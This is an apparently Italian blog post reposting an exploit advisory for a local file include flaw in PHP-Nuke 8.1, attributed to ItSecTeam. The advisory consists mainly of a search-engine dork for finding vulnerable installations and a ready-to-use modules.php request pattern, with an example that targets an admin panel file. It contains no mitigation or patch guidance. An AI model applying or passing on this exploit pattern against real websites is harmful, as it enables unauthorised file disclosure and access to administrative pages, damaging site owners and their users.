Exploit-db pubblica una nuova falla del famoso cms PHP -Nuke che affligge l’ultima relase 8.1 e permette di visionare il contenuto di un qualsiasi file all’interno della root FTP.
Dopo il salto l’exploit…
=============================================================================== Topic : Php-Nuke Bug type : Local File Include Vulnerability Author : ItSecTeam Remote : Yes Status : Bug ===================== Content ====================== ( # Advisory Content : Php-Nuke Lastest Version ( # Mail : [email protected] ( # Dork : Php-Nuke Lastest Version ( # We Are : [email protected] , 0xd41684c654 And All Team Members! ( # Website : WwW.ItSecTeam.com<http://www.itsecteam.com/> ( # Forum : WwW.Forum.ItSecTeam.com<http://www.itsecteam.com/> ( # Find By : Amin Shokohi(Pejvak!) ================================================= ======================================= Exploit ================================ ( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name ( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel ===============================================================================
